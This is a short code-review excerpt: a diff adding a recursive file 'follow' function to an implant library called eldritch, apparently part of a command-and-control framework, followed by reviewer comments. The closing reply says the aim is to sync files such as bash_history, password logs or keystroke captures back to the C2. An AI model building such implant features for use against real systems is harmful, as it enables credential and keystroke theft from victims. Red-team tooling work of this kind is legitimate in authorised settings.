implants/lib/eldritch/src/file/follow_impl.rs

```diff
@@ -0,0 +1,20 @@
+use std::path::Path;
+
+use anyhow::{anyhow, Result};
+use starlark::{eval::Evaluator, values::Value};
+
+pub fn follow<'v>(path_str: String, f: Value<'v>, eval: &mut Evaluator<'v, '_>) -> Result<()> {
+    let starlark_heap = eval.heap();
+    let path = Path::new(&path_str);
+    if path.is_dir() {
+        for entry in path.read_dir()? {
+            let entry = entry?;
+            let entry_path = entry.path().to_str().ok_or(anyhow!("Failed to convert path to str"))?.to_string();
+            follow(entry_path.to_string(), f, eval)?;
```

Comment:
Isn't this a IO blocking op? Won't it just read infinitely from the first file it finds and block the other files from being read?

Reply:
It's basically going in DFS

If while executing on a directory it finds a directory, it will recurse into that.

Reply:
Let's do just one file.
The main goal is to be able to sync a file like bash_history, a password log, or keystrokes file back to the c2.